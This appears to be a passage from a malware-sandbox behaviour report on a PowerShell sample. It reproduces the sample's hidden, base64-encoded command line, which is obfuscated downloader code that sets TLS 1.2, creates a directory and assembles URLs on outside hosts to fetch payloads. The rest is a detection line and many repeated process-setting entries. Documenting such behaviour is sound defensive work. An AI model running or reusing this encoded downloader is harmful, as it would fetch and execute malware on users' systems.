vACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation:

barindex
Suspicious powershell command line foundShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAK
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAEEA336E3 push eax; retf 2_2_00007FFAEEA336F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAEEA34091 pushfd ; retf 2_2_00007FFAEEA340F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAEEB06062 push E800000Dh; retf 2_2_00007FFAEEB06071
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAEEB077CA push es; ret 2_2_00007FFAEEB07837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFAEEB07812 push es; ret 2_2_00007FFAEEB07837
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
